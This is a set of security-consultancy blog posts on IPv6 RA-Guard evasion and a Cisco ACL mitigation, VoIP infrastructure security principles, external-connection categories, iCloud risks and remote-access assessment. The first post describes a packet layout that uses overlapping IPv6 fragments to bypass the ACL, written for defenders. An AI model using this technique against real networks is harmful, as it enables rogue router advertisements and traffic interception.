TROOPERS12 came to an end last week on Friday; needless to say it was an awesome event. 😉
The first two days offered workshops on various topics. On Monday Enno, Marc “Van Hauser” Heuse and I gave a one day workshop on “Advanced IPv6 Security”. I think attendees as well as trainers had a real good time during and after the workshop fiddling around with IPv6. Especially Marc had quite some fun as he discovered that we provided “global” IPv6 Connectivity for the conference network, and according to one of his tweets, TROOPERS12 was the first security conference he visited, offering this kind of connectivity.
So back to the topic
Our last posts on IPv6 Security go back to the first half of 2011. If you haven’t read them already, now it’s a good time to do so. You can find them here, here, here and here.
In the last post of the series Enno discussed how RA-Guard can be circumvented with clever use of extension headers. As a short reminder, the packet dump looks like this.
The Information of the upper-layer protocol is only present in the second fragment, so RA Guard does not kick in.
As we found out on the Heise IPv6 Kongress last year, this issue can be mitigated with the following parameter in an IPv6 ACL.
deny ipv6 any any undetermined-transport
As a reminder, this parameter drops all IPv6 packets where the upper-layer protocol information cannot be determined.
After the workshop was officially over, Marc and I played a little bit with this ACL Parameter to see if it is working as intended. So I configured the following IPv6 ACL on our beautiful Cisco 4948E:
4948E(config)#ipv6 access-list IPv6
4948E(config-ipv6-acl)#deny ipv6 any any undetermined-transport
4948E(config-ipv6-acl)#permit ipv6 any any
4948E(config)#interface g1/19
4948E(config-if)#ipv6 traffic-filter IPv6 in
We started the attack again with the following parameter:
Apparently nothing happened with my (IPv6 enabled) laptop (which is a good thing ;))
The corresponding packet dump looked quite unspectacular:
Only the STP packets could be seen, and the flooded router advertisements were dropped by the Switch.
So could this parameter solve the issue with the whole RA mess?
Unfortunately the answer is no. The ACL parameter does mitigate the issue with the fragmented router advertisement. However, the ACL parameter can be circumvented by using overlapping fragments. Unfortunately we couldn’t test this scenario because this wasn’t yet implemented in the THC Tool Suite, but this is just a matter of time…
The IPv6 Packet basically looks like this:
Fragment 1:
IPv6 Header
Fragmentation Header
Destination Header (8 bytes)
ICMPv6 with Echo Request
Fragment 2:
IPv6 Header
Fragmentation Header with offset == 1 (equals position of 8th byte ==
start of Echo Request in first fragment)
ICMPv6 with RA
In this case it depends on the operating system whether or not the packet is discarded when overlapping fragments are detected. RFC 5722 is very specific on how these should be handled:
“When reassembling an IPv6 datagram, if one or more its
constituent fragments is determined to be an overlapping
fragment,the entire datagram (and any constituent fragments,
including those not yet received) MUST be silently discarded.”
So it is up to the operating system to implement this behavior. We’ll see how things work out 😉
If you’re interested in more IPv6 issues, or simply wanna chat about this topic, meet Enno and me again at the Heise IPv6 Kongress this year in Frankfurt, where we will give a talk on IPv6 as well.
if you’re following this blog regularly or if you’ve ever attended an ERNW-led workshop which included an “architecture section” you will certainly remember the “Seven Sisters of Infrastructure Security” stuff (used for example in this post). These are a number of (well, more precisely, it’s seven ;-)) fundamental security principles which can be applied to any complex infrastructure, be that a network, a building, an airport or the like.
As part of our upcoming Black Hat and Troopers talks we will apply those principles to some VoIP networks we (security-) assessed and, given we won’t cover them in detail there, it might be helpful to perform a quick refresher of them, together with an initial application to VoIP deployments. Here we go; these are the “Seven Sisters of Infrastructure Security”:
Access Control
Isolation
Restriction
Encryption
Entity Protection
Secure Management
Visibility
Now, let me discuss them in a bit more detail and put them into a VoIP context.
Access Control (“try to keep the threats out of the environment containing the assets to be protected”)
This should pretty much always be an early consideration as limiting access to “some complex infrastructure” obviously provides a first layer of defense and does so in a preventative[1] way. Usually authentication plays a major role here. Please note that in computer networks the access control principle does not only encompass “access to the network [link]” (where unfortunately the most prevalent technology – Ethernet – does not include easy-to-use access control mechanisms. And, yes, I’m aware of 802.1X…) but can be applied to any kind of (“sub-level”) communication environment or exchange. Taking a “passive-interface” approach for routing protocols is a nice example here as this usually serves to prevent untrusted entities (“the access layer”) from participating in some critical protocol [exchange][2] at all.
In a VoIP scenario limiting who can participate in the various layers and communication exchanges, be it by authentication, be it by configuration of static communication peers for certain exchanges[3] (yes, we know this might not scale and usually has a bad operational feasibility) would be an implementation of the access control principle.
Isolation (“separate some elements of the environment from others, based on attributes like protection need, threat potential or trust/worthiness”)
In computer networks this one is usually implemented by network segmentation (with different technologies like VLANs or VRFs and many others) and it’s still one of the most important infrastructure security principles. I mean, can you imagine an airport or corporate headquarters without areas of differing protection needs, different threat exposure or separate layers and means of access? [You can’t? So why do you think about virtualizing all your corporate computer systems on one big unified “corporate cloud”? ;-)]
Again, it should be noted that “traditional network segmentation” is only one variant. Using RFC 1918 (or ULA, for that matter) addresses in some parts of your network without NATing them at some point, or refraining from route distribution at some demarcation point constitute other examples.
In the VoIP world the main realization of the isolation principle is the commonly found approach of “voice vs. data VLAN[s]”.
Restriction (“once [as of the above principle] isolated parts get connected try to limit the interaction between those parts at the intersection point”)
This is the one most people think of when it comes to network security as this is what the most widely deployed network security control, that is firewalls, is supposed to do.
Two points should be noted here, from our perspective:
In some network security architecture documents phrases going like “the different segments are [to be] separated by firewalls” can be found. Which, well, is a misconception: usually a firewall connects networks (which would be isolated otherwise), it does not separate them. It may (try to) limit the traffic passing the intersection point but it still is a connection element.
And it should be noted that the restriction it applies (by filtering traffic) always has an operational price tag. Which is the one of the reasons why firewalls nowadays tend to fail so miserably when it comes to their actual security benefit…
In VoIP networks using the restriction approach is considerably hard (and hence quite often simply doesn’t happen) given a number of protocols’ volatility when it comes to the (UDP/TCP) ports they use.
Encryption (“while in transit encrypt some asset to protect it from threats on its [transit] way”)
This is a very common infrastructure security control as well (alas, at times the only one people think of) and probably does not need further explanation here.
Still it should be noted – again – that it has an operational price tag (key management and the like). Which – again – is the very reason why it sometimes fails so miserably when it comes to providing actual security…
In the VoIP world (as this one is very much about “assets in transit”) it’s (nowadays) a quite common one, even though still a number of environments refrains from using it, mainly due to the mentioned “operational price tag”.
Entity Protection (“take care of the security exposure of the individual elements within the environment containing the assets to be protected”)
This encompasses all measures intended to increase the security of individual elements. It’s not limited to simple hardening though, but includes all other “security [posture] quality assurance” things like pentesting or code reviews (when the element looked at is an application).
Adding a comment again I’d like to state that, in times of virtualization and vaporizing security layers (deploying shiny apps pretty much directly connecting customers to your ERP systems, by means of fancy webservices) this one might become more and more important. In the past many security architectures relied on layers of isolation & restriction and thereby skipped the hardening/quality assurance step (“we don’t have to harden this Solaris box as there’s a firewall in front of it”). As the talks’ case studies will show this one is a fundamental (and overlooked) one in many VoIP deployments.
Secure Management (“manage the [infrastructure] elements in a secure way”)
Secure management usually can be broken down to:
Restrict the endpoints allowed to establish management connections.
Either use a trusted environment (network link) or use secure variants of mgmt. protocols instead of their less secure counterparts (SSH vs. Telnet, HTTPS vs. HTTP, SNMPv3 vs. community-based SNMP and the like).
Logging of security related events and potentially all management actions performed.
While this is (should be) an obvious security principle, daily assessment experience shows that failures/weaknesses in this space account for the majority of critical vulnerabilities when it comes to infrastructure security. This applies in particular to VoIP implementations (see the case studies for examples).
Visibility (“be able to assess the current security posture of your infrastructure and its elements with reasonable effort”)
This is where logging (+ analysis), monitoring etc. come into play. We’d like to note that while this is a valid infrastructure security principle, its actual security benefit is often overestimated given the “detection/reaction” nature of this principle and its subsequent bad operational feasibility.
This is a particularly interesting (and neglected) one in many VoIP environments. Usually the data generated in this space (for VoIP) can not be easily processed (by $SIEM you acquired two years ago, for a six-figure € number and which still has only a handful of use cases defined…), while on the other hand being heavily useful (or even required for legal follow-up) in one of those numerous billing fraudincidents.
How to Apply those Principles in a Generic Way
As the above application to VoIP shows, these fundamental security principles allow for tackling any type of “securing assets within a complex overall setting” by going through a simple (checklist-type) set of questions derived from them. These questions could look like
Can we limit who’s taking part in some network, protocol, technology, communication act?
Any need to isolate stuff due to different protection need, (threat) exposure or trust(worthiness)?
What can be done, filtering-wise, on intersection points?
Where to apply encryption in an operationally reasonable way?
What about the security of the overall system’s main elements?
How to manage the infrastructure elements in a secure way?
How to provide visibility as for security-related stuff, with reasonable effort?
In a sequel to this post I might cover the mentioned case studies in more detail. In case I miss doing so, the slides will be available after the respective events ;-).
Have a great Sunday,
Enno
[1] As it requires the usually most scarce resource of an organization, that is humans and their brains. The part that can not be easily substituted by technology…
[1] In general preventative controls have a better cost/benefit ratio than detective or reactive ones. And this is still true in the “you’ll get owned anyway that’s why you should spend lots of resources on detective/reactive controls” marketing hype age…
[2] To provide another example from the routing protocol space: the “inter-operator trust and TCP-” based nature of BGP (as opposed to the “multicast and UDP-“based nature of other routing protocols) certainly is one of the most fundamental stability contributing properties of the current Internet.
[3] Another simple example here. If the two VoIP gateways in the incident described here had used a host route for each other instead of their default route (which wasn’t needed given their only function was to talk to each other), presumably the whole thing wouldn’t have happened.
I’m currently involved in creating an up to date approach to handling external connections (read: temporary/permanent connections with external parties like business partners) of a very large enterprise. Currently they have sth along the lines of: “there’s two types of external connections, trusted and untrusted. the untrusted ones have to be connected by means of a double staged firewall”.
Which – of course – doesn’t work at all in a VUCA world, for a number of reasons (the demarcation between trusted and untrusted is quite unclear – just think of mergers & acquisitions –; “business doesn’t like implementing 2-staged firewalls in some part of the world where they just signed the memorandum for a joint venture to build windmills in the desert”; firewalls might not be the appropriate control for quite some threats anyway – see for example slide 46 of this presentation– and so on). Not to mention that I personally think that the “double staged firewall” thing is based on an outdated threat model, in particular when implemented with two different vendors (for the simple reason that the added operational effort usually is not worth the added security benefit. see this post for some discussion of the concept of “operational feasibility”…).
Back to the initial point: the approach to be developed is meant to work on the basis of several types of remote connections which each determine associated security controls and other parameters. Which, at the first glance, does not seem overly complicated, but – as always – the devil is in the details.
What to base those categories on: the trust or security level of the other party (called “$OTHER_ORG” in the following) – or just assume they’re all untrusted? The protection needs of the data accessed by $OTHER_ORG? The (network) type of connection or number & type of users (unauthenticated vs. authenticated, many vs. few), the technical characteristics of the services involved (is an outbound Bloomberg link to be handled differently than an inbound connection to some published application, by means of a Citrix Access Gateway? if so, in what way?) etc.
As a start we put together a comprehensive list of questions as for the business partner, the characteristics of the connection and the data accessed and other stuff. These have to be answered by the (“business side”) requestor of an external connection. To give you an idea of the nature of questions here’s the first of those (~ 40 overall) questions:
Please provide details as for the company type and ownership of $OTHER_ORG.
More specifically: does $COMPANY hold shares of $OTHER_ORG?
Who currently manages the IT infrastructure of $OTHER_ORG?
Does $OTHER_ORG dispose of security relevant (e.g. ISO 27001) certifications or are they willing to provide SAS 70/ISAE 3402/SSAE 16 (“Type 2”) reports?
What is – from your perspective – $OTHER_ORG’s maturity level as for information security management, processes and overall posture?
How long will the connection be needed?
Which $COMPANY resources does $OTHER_ORG need to access?
Does a risk assessment for the mentioned ($COMPANY) resources exist?
What is the highest (data) classification level that $OTHER_ORG needs access to?
What is the highest (data) classification of data stored on systems that $OTHER_ORG accesses by some means (even if this data is not part of the planned access)?
Will data be accessed/processed that is covered by regulatory frameworks [e.g. Data Protection, PCI, SOX].
What would – from your perspective – be the impact for $COMPANY in case the data in question was disclosed to unauthorized 3rd parties?
What would – from your perspective – be the impact for $COMPANY in case the data in question was irreversibly destroyed?
What would – from your perspective – be the impact for $COMPANY in case the service(s) in question was/were rendered unavailable for a certain time?
We then defined an initial set of “types of connections” that dispose of different characteristics and might be handled with different measures (security controls being a subset of these). These connection types/categories included
“trusted business partners”/TBP (think of outsourcing partners, with strong mutual contractual controls in place etc.).
“external business partner”/EBP (this is the kind-of default, “traditional” case of an external connection).
“mergers & acquisitions [heritage]”/MA (including all those scenarios deriving from M & A, like “we legally own them but don’t really know the security posture of their IT landscape” or “somebody else now legally owns them, but they still need heavy access to our central systems, for the next 24-36 months”).
“business applications”/BusApp (think of Bloomberg access in finance or chemical databases in certain industry sectors).
“external associates”/ExtAss (“those three developers from that other organization we collaborate with on developing a new portal for some service, who need access to the project’s subversion system which happens to sit in our network”).
Next we tried to assign a category by analyzing the answers in a “point-based” manner (roughly going like: “in case we own them by 100% give a point for TBP”, “in case the connection is just outbound to a limited set of systems, give a point to BusApp”, “if it’s an inbound connection from less than 10 users, here’s a point for ExtAss” etc.), in an MS Excel sheet containing the questions together with drop-down response fields (plus comments where needed) and some calculation logic embedded in the sheet. This seemed a feasible approach, but reflecting on the actual points and assignment system, we realized that, in the end of the day, all these scenarios can be broken down to three relevant parameters which in turn determine the handling options. These parameters are
the trustworthiness of some entity (e.g. an organization, a network [segment], some users). pls note that _their trustworthiness_ is the basis for _our trust_ so both terms express sides of the same coin.
the (threat) exposure of systems and data contained in certain parts of some (own|external) network.
the protection needs of systems and data contained in certain parts of (usually the “own”/$COMPANY’s) network.
Interestingly enough every complex discussion about isolating/segmenting or – the other side of the story – connecting/consolidating (aka “virtualizing”) systems and networks can be reduced to those three fundamentals, see for example this presentation (and I might discuss, in another post, a datacenter project we’re currently involved in where this “reduction” turned out to be useful as well).
From this perspective a total of eight categories can be defined, with each of those mentioned parameters potentially being “high” or “low”. These would look like
Taking this route greatly facilitates the assignment of both individual connections to a category and sets of potential (generic) controls to the connection type categories, as each answer (to one of those questions) directly influences one of those three parameters (e.g. “we hold more than 50% of their shares” => increase trust; “$OTHER_ORG needs to access some of our systems with high privileges” => increase exposure; “data included that is subject to breach laws” => increase protection need etc.).
Which in turn allows a (potentially weighted) points based approach to identify those connections with many vs. few (trust|exposure|protection need) contributing factors.
More on this including details on the actual calculation approach and the final assignment of a category in the next part of this series which is to be published soon…
“This document was produced jointly with the OWASP mobile security project. It is also published as an ENISA deliverable in accordance with our work program 2011. It is written for developers of smartphone apps as a guide to developing secure apps. It may however also be of interest to project managers of smartphone development projects.
In writing the top 10 controls, we considered the top 10 most important risks for mobile users as described in (1) and (2). As a follow-up we are working on platform-specific guidance and code samples. We hope that these controls provide some simple rules to eliminate the most common vulnerabilities from your code.”
After having a first look at the document’s content I can, while not being a developer myself, state there’s a lot of valuable guidance in it. Which is particularly useful as our assessment experience shows that quite some things (examples to be discussed in this upcoming talk at Troopers) can go wrong as for application security on smartphones.
Currently there’s quite some discussion ongoing why it took Apple so long to fix a severe vulnerability in the update process of iTunes. A severe vulnerability which could easily be exploited by means of an automated tool called evilgrade which can be downloaded here (Hi Francisco!). Just one small note here: did you know that evilgrade was first shown and released at the 2008 edition of Troopers? We had a number of initial releases of tools in the last years (like wafw00f at the 2009 edition and VASTO at the 2010 edition) and we will continue this fine tradition in 2012. I can already promise that some nice code is going to be released for the first time at Troopers12…
The above is the exact title of a Gartner research note published some days ago. Its main thesis is that an increased convergence of carriers’ MPLS and Internet infrastructures onto shared IP infrastructures requires that enterprises re-evaluate their security and performance risks.
While I do not agree with the overall line of reasoning in the paper, it still highlights a number of interesting points when it comes to MPLS security. Which in turn reminds me of quite some stuff we’ve done in the past, mainly our Black Hat Europe 2009 talk “All your packets are belong to us – Attacking backbone technologies”. Today we’ll release an updated version of the accompanying whitepaper as a kind-of technical report. Its title is “Practical Attacks against MPLS or Carrier Ethernet Networks” and it can be found here.
Enjoy reading,
Enno
btw: for those of you who have actually read the Gartner paper… did you notice their repeated reference to customer RFIs/RFPs not covering a carrier’s separation between their public Internet and MPLS infrastructures? Here’s a document that describes how a given carrier’s trustworthiness might be evaluated and which furthermore contains an excerpt from an RFI (written back in 2006!) which, amongst others, ask for this very point…
As a follow-up to this post somebody pointed us to this interesting article on S/MIME support and associated certificate mgmt in iOS 5. Nice read which some of you may find worthwhile.
On a related note: if anyone is aware of an easy way/good (3rd party) solution for pushing certs to iOS devices (besides SCEP) we would be very interested in that one. In that case pls leave a comment or shoot us an email.
A few days ago (on 10/12/2011) Apple launched its new cloud offering which is called — who would have guessed 😉 — iCloud. Since we’re performing quite some research in the area of cloud security, we had a first look at the basic functionality and concepts of the iCloud. Its main features include the possibility to store full backups of Apple devices (at least, an iPhone, iPad or iPod touch running iOS 5 or a Mac running OS X Lion 10.7.2 is required), photos, music, or documents online. The data to be stored online is initially pushed to the cloud storage and then synchronized to any device which is using the same iCloud account. From this moment on, all changes on the cloudified data is immediately synchronized to the iCloud and then pushed to all participating devices. At this point, most infosec people might start to be worried a little bit: The common cloud concept of centralized data storage on premise of a third party does not cope well with the usual control focused approach of most technical infosec guys. The resulting concerns can be attributed to several main cloud computing related risks (which are proposed by ENISA and actually very valuable work:
Lock In: According to the way the cloud functionality is integrated into iOS and OS X , usage of the iCloud might result in strong lock in effects. There is neither the possibility to use different backend cloud storage for the functionality nor the possibility to develop a product which provides similar functionality (see later paragraphs for examples).
Isolation Failure: is probably the most present threat for many IT people, since it is highly related to technical implementation details. It includes, but is not limited to, breakout attacks from guest systems due to vulnerabilities in the hypervisor or to unauthorised data access due to insufficient permission models in backend storage. Thinking of the trust factor consistency, Apple’s history of cloud based services was not their “finest hour” (as Steve Jobs stated during his keynote on iCloud). Remembering this talk and the awkward MobileMe vulnerabilities, we would agree with that 😉
Loss of Governance: The loss of governance over data in the cloud is kind of an intrinsic risk to cloud computing (also refer to the proposed system operation life cycle and the motivation given here). Again, referring to explanations about the technical iCloud implementation in the later paragraphs, this loss might be even more relevant in the iCloud environment.
Data Protection Risks: Handing over responsibility for the storage of data to the cloud service provider, a customer also hands over the possibility to protect his valuable (or more concrete: personal) data by controls of his choice. Reviewing Apple’s terms of service for the iCloud, the following paragraphs are somewhat related to data protection issues: You understand that in order to provide the Service and make your Content available thereon, Apple may transmit your Content across various public networks, in various media, and modify or change your Content to comply with technical requirements of connecting networks or devices or computers. You agree that the license herein permits Apple to take any such actions. And in addition, the Apple Privacy Policy states the following: You further consent and agree that Apple may collect, use, transmit, process and maintain information related to your Account, and any devices or computers registered thereunder, for purposes of providing the Service, and any features therein, to you., which kind of reminds of the Dropbox Terms of service which even state that they are allowed to transfer your data to anybody if it is necessary in order to assure the quality of the offered service. Thinking of the trust factor components, all of these risks are getting even more relevant since Apple relies on third party cloud services (which are Amazon Web Services and Azure, according to several sources, including this one), which conclusively must also fulfill certain security requirements in order to lower the vulnerability factors for the presented risks.
There are some more risks according to the ENISA study, but those are beyond the scope of this post. If we do such rough assessments as sample exercises during our cloud security workshops, the participants usually ask what “they can do”. Possible controls can be divided into two groups: controls to reduce the risk to a reasonable level and controls which prohibit the usage of the particular service. When analyzing the cloud, the control always mentioned first is crypto. Speaking of cloud storage, crypto is a valid control to ensure that unauthorized access (e.g. due to isolation failure/physical access/subpoena) to data has no relevant impact. The only requirement is that the encryption is performed on client side (depending on the attacker model and whether you trust your cloud service provider). For example, Amazon provides a feature which is called Server Side Encryption which encrypts any file that is stored within S3. Additionally, Amazon allows the implementation of a custom encryption client which enables customers to perform transparent encryption of all files which are stored in S3. The analysis of the security benefits, attacker models, and operational feasibility of these controls will be the subject of yet-another blogpost, but at least Amazon offers these encryption features. The offered services of the iCloud differ a little bit in functionality (for example, the iCloud iTunes version is a kind-of music streaming platform), but basically there are two API functions which allow access to the iCloud backend. First, it is possible to store documents (where documents can be complete directory structures) in the iCloud, second, a so called key-value store can be accessed. The access is encapsulated in dedicated API calls which take care of the complete data transfer, synchronization, and pushing operations using an iCloud daemon. So any use of the iCloud is strictly connected to an app (I would have called it application ;-)) which has to use the introduced iCloud API calls. Even though I’m not that familiar with the iOS/OS X architecture, I would have guessed that it would have been easily possible to add client side encryption using the internal keychain and usual cryptographic mechanisms. Still, this is not the fact and it is questionable, regarding the user experience oriented focus of Apple, whether this feature will be implemented in the future. This lack of encryption possibility brings up the second class of controls, which shall restrict the iCloud usage. This is especially important in corporate context, where full backups of devices would potentially expose sensitive corporate data to third parties. Even though the usage might be restricted by acceptable use policies, this might not enough since the activation of this feature can happen accidentally: If a user logs in once into the iCloud frontend, which is possible using a regular apple ID, the data synchronization is enabled by default and starts immediately (refer also to the quoted terms of service above). Since most corporate environments use MDM solutions, it is possible to restrict the iCloud usage at least for iOS based devices. The corresponding configuration profiles offer several options to disable the functionality:
allowCloudBackup
allowCloudDocumentSync
allowPhotoStream
For today, this little introduction to iCloud and some of its security and trust aspects will be finished here. We will, however, continue to explore the attributes of iCloud more deeply in the near future (and we might even have a talk on it at Troopers ;-).
We recently performed a Proof-of-Concept (PoC) implementation of certificate based auth with iPads in some large environment. So far the focus has been mainly on WLAN access; VPN and EAS authentication are going to follow in the next step.
As we figure that the topic might be of interest for some of you, we’ve extracted a certain, not-too-customer-specific part of the deliverable and converted it into an ERNW newsletter. Special thanks go to Rene Graf for leading the project! 😉
Of course, this stuff is going to be covered in much more detail in the Troopers12 edition of our “iOS Security Workshop” (see here for the agenda of this year or here for a German version of the current one).
I’m currently involved in a “Remote Access Security Assessment” and you might be wondering what exactly this means. Well, so did we. At least to some degree (btw: last year we provided some notes on types of security assessments here).
It happens quite often we’re brought into an organization to perform “a security assessment” of “some item” (“our network”, “that new procurement portal”, “the PKI” etc.). It happens as well the customer does not have a very clear idea of the way such an assessment should be carried out (telling us “you are the experts, you should know what to do”). Or the five people from the customer’s side present in the kick-off meeting have five different concepts (ok, four. as one of them only wants “to get that damned assessment done so we can finally go live”) and we end up moderating their arguments on what should be tested, how this should be done, when this is going to happen, which type of report format is needed (obviously, there’s different ones, depending on the goal/scope/methodology of the assessment…) etc.
In such “vague cases” we usually define a set of (~ 10) categories/[security] criteria to be fulfilled by the item in question, based on different sources like the organization’s internal policy framework, potentially the project-to-be-assessed’s security goals, relevant standards and “common security best practices” (often the latter only to a small degree as we have a mostly risk based security approach which does not necessarily fit very well with [assumption-based] “best practices”; more on this philosophical question in yet-another-post ;-))
For example, in the case of a “Firewall & DMZ assessment” these categories/criteria could include stuff like “Dedicated LAN switches” (from $ORG’s internal guidelines), “Logging of denied packets” (same source), “Secure management” (from ISO 18028-3), “Scalability” (based on business needs as for $ITEM) or “Proper vulnerability mgmt” (ISO 27001).
We then perform a combination of assessment methods to obtain the necessary information to evaluate those categories in terms of “fulfilled”, “major/minor non-compliance”, “leads to relevant business risk”, “documentation missing” and the like.
Figuring the individual categories/criteria which are suited to the customer, their needs and the assessment’s (time, budget, political) constraints usually is intellectually challenging and thus “hard work”. Still, this approach (hopefully ;-)) ensures we can “answer the customer’s relevant question[s] in a structured way and with reasonable effort”.
So why do I tell you all this (besides the implied shameless self-plug)? I faced the very situation in the mentioned “Remote Access Security Assessment” and made some observations that I think are worthwhile sharing.
Let’s have a look at the potential sources for the approach laid out above:
a) internal policies: if I told you that “no formal document written, say, in the last five years, covering the topic and/or available to the people engaging us” could be identified, you wouldn’t be surprised, would you? 😉
[ok, I didn’t give you any details as for the customer… but does it really matter? how many organizations do you know which have an up-to-date “remote access policy”… I mean, one that actually provides reasonable guidance besides “all remote access must be secured appropriately” …]
b) standards & “best practices”
To discuss these I’d first like to introduce some level of abstraction shortly – regular readers of this blog might remember my constant endeavor to “bring structure into things”- by breaking down “a remote access solution” to the following generic entities involved:
gateway(s)
network transmission incl. protocols & algorithms
“endpoints”
Traditionally there have been 3-4 relevant standard documents in the remote access space, that are ISO 18028-4 Information technology — Security techniques — IT network security — Part 4: Securing remote access (latest version from 2005), NIST SP 800-77 Guide to IPsec VPNs (2005), NIST SP 800-113 Guide to SSL VPNs (2008) and potentially revision 1 of NIST SP 800-46 Guide to Enterprise Telework and Remote Access Security (Rev. 1 published in June 2009).
[Of course, feel free to notify me by PM or comment on this post if you’re aware of others].
Those documents are mainly focused on the first two of the above “abstract elements”, that are gateways and network transmission, which results in lengthy discussions of gateway architectures or protocol specifics and ciphers. It becomes clear that back then the main threats were considered to be “attacks against gateways” or “attacks against network traffic in transit” (whereas today the main risk is probably “unauthorized physical access to endpoint”, after loss or theft of device/smartphone).
But times have changed, and in 2011 I tend to assume that these two elements (gateways, network transmission) are sufficiently well handled & secured in the vast majority of organizations. Ok, just when I write this I somehow hesitate, given I recently worked in an environment where the deployed gateways (based on the – from my perspective – market lead SSL gateway solution) were configured to support stuff like this:
SSLv3
———————————————————————-
AES256-SHA – 256 Bits
DES-CBC3-SHA – 168 Bits
AES128-SHA – 128 Bits
RC4-SHA – 128 Bits
RC4-MD5 – 128 Bits
DES-CBC-SHA – 56 Bits
EXP-DES-CBC-SHA – 40 Bits
EXP-RC2-CBC-MD5 – 40 Bits
EXP-RC4-MD5 – 40 Bits
TLSv1
———————————————————————-
AES256-SHA – 256 Bits
DES-CBC3-SHA – 168 Bits
AES128-SHA – 128 Bits
RC4-SHA – 128 Bits
RC4-MD5 – 128 Bits
DES-CBC-SHA – 56 Bits
EXP-DES-CBC-SHA – 40 Bits
EXP-RC2-CBC-MD5 – 40 Bits
EXP-RC4-MD5 – 40 Bits
Not that I regard this as a relevant risk, it’s just interesting to note. I mean, it’s 2011…
Back to track: so, while gateways and protocols might no more constitute areas of “deep concern”, nowadays “the endpoint” certainly does. When the mentioned standards were written, endpoints were supposed to be mostly company managed Windows systems. In the meantime most organizations face an “unmanaged mess”, composed of a growing number of smartphones and tablets of all flavors, some – to some degree – company managed, quite some predominantly “free floating”.
And unfortunately there is – to the best of my knowledge – no current (industry) standard laying out how to handle these from a security perpective. Which in turn means once an “authoritative framework” is needed (be it for policy reasons, be it for assessments using the approach I described above) there’s nothing “to rely on”, but this has to be figured by the individual organization.
To get a clearer picture I went out contacting “some of my ISO colleagues” in the “how do you handle this?” manner. In the following I’ll lay out “the results how mature organizations address the topic”, together with some recommendations from our side, based on our usual approach to balance security and business needs.
In the end of the day the task can be broken down to the question: “which types of endpoints should be allowed which type of access to which (classification level of) data?”.
To answer this one in a comprehensive and consistent way a number of factors has to be taken into account:
different types of endpoints.
different types of “access methods”.
classification of data to be processed.
potential prerequisites for certain use cases (type of authentication, employee signing an acceptable use policy [AUP], additional [technical] security controls on endpoints and the like).
Classifying types of endpoints
I personally think that the “traditional distinction” between (just) company-managed and non company-managed – which is used for example in ISO 18028-4 and NIST SP 800-113 – does no longer work, but that it makes sense to differentiate roughly between three types of endpoints. To characterize those I quote from a policy I wrote some time ago:
“Company managed device
Any device owned and managed by $COMPANY, e.g. corporate laptops.
Private trustworthy device
Any device that is owned by an individual employee which is used solely by named invidual and which is kept in an appropriate state as for security controls (up-to-date patch level, anti-malware protection and/or firewall software if feasible etc.). It might be (partly) managed by company driven controls (e.g. configuration policies).
If used for local processing of restricted data appropriate encryption technologies protecting said data must be in place.
In no instance shall any competitors, business partners, and/or other business-relevant parties be allowed to physically access such a device, even if such persons are otherwise related to the employee or are personal friends or acquaintances of the employee. Furthermore information classified ‘strictly confidential’ shall never be processed on this type of device.
Untrusted device
All other devices, for example systems in a cyber café or devices in an employee’s household which are shared with family members or friends.”
Pls note that both NIST SP 800-46r1 (where the party responsible for the security of the device is taken into account. and this one can be: organization, teleworker, third party.) and Gartner (classifying into “platform”, “application” and “concierge” types of services) use a similar three-fold classification approach.
Access methods
By “access method” I mean the way the actual data processing is performed. Let’s classify as follows:
“full network access” by means of a tunneled IP connection, provided by a network stack like piece of code. This is where the traditional full-blown IPsec or SSL VPN clients come into play.
“application based” access. This includes all HTTP(S) based portals (with MS Outlook Web Access [OWA] being the most prominent example) and the portals provided by typical SSL VPN gateways that enable users to run certain applications (MS Outlook, SAP GUI, File Browsing and the like).
“restricted application based”: same as above but usually without file exchange between remote network and local system, e.g. OWA without attachments, or remote desktop access without use of local drives, no copy+paste in TS client etc.
“(just) presentation logic”: here no actual data processing on the endpoint takes place. The best known example is probably Citrix based stuff, in different flavors (ICA client, Citrix Receiver, xd-agent et.al.).
Classification of data to-be-processed
Another aspect to take into account is the classification of the data that is allowed to be processed on a “remote device”. While this may seem a no-brainer at the first glance, in reality this is a tricky one as most organizations do not dispose of a (“widely used in daily practice”) data classification scheme anyway and usually there’s no file (other information entity) attributed meta-information that allows the easy identification of its classification level, together with a subsequent enforcement of technical controls (which, btw, is one of the main reasons why DLP is so hard to implement correctly. which could be discussed in more detail in another post 😉
And, of course, for an employee who has access anyway technically it’s usually easy to process higher classified data “than allowed”. The most common approach addressing this is having the employees siging AUPs prohibiting this/such type of handling, combined with some liability in case of breaches of such data (this approach, again, might be a minefield in itself, depending on the part of the world and associated juridical system you’re [located] in ;-)).
For the following discussion let’s assume that organizations use a scale of four classifications/ classes designated SC0 to SC3 (where SC = “security class” or “security classification”) with 3 being the highest (e.g. “strictly confidential” or “top secret”) and 0 being the lowest (e.g. “public”, “unclassified”).
Prerequisites for certain use cases
Frequently additional organizational or technical prerequisites for certain use cases (e.g. types of devices, potentially in combination with certain access methods) are induced. In this space can be found:
Acceptable Use Policies (AUPs) prescribing what can or should be done, which lay out “prohibited practices” (that might still technically possible, see above), the handling of backups, the separation of business and private use etc.
the level of authentication required for certain usage scenarios.
additional security controls on the endpoint (anti-malware, local firewall, local disk/file/container encryption and the like), with their presence on the endpoint potentially verified by some “host integrity checking” technology, e.g. “UAC” in Juniper space. In this context it should be noted that in most environments UAC or similar approaches from other vendors do not provide an actual security benefit (“enforce that only a trustworthy and secure endpoint can connect”) but simply differentiate between “company managed” and “unmanaged” in the way “look for a certain registry key and if present assume that’s a company managed device” (“no idea if the associated piece of security software is really present, let alone correctly configured, not to mention that it provides any actual security benefit”…).
Putting it all together
Now, putting all this together I came up with the following table. It displays what we feel “is common best security practice” nowadays for handling remote access (endpoint) security, balancing business and security needs:
Type of device
Classification of data (allowed) to be processed
Allowed access methods
Prerequisites
company managed
usually all, some organizations do not allow highest on mobile devices at all
all
private trustworthy (which means, as of definition, disposing of appropriate capabilities/controls)
depends. some organizations do not allow highest in this scenario. We recommend: no SC3 here.
usually all, but “application based” preferred over full network connect
MFA, appropriate capabilities, sometimes AUP
all (others) including “private” devices without appropriate capabilities (e.g. apps on iPads that do not use the “data protection” feature)
SC3 not allowed at all. In case of SC2…
no data processing on device, only presentation logic
MFA, Employee signed AUP
SC0, SC1 only
“restricted application based” recommended
all others when gateway deployed sandbox technologies (e.g. Juniper Secure Virtual Storage for Win32 systems) are used.
depends, usually sth in the range SC 0-2, pretty much never SC3. We recommend: no SC3.
“application based”
MFA, Employee signed AUP
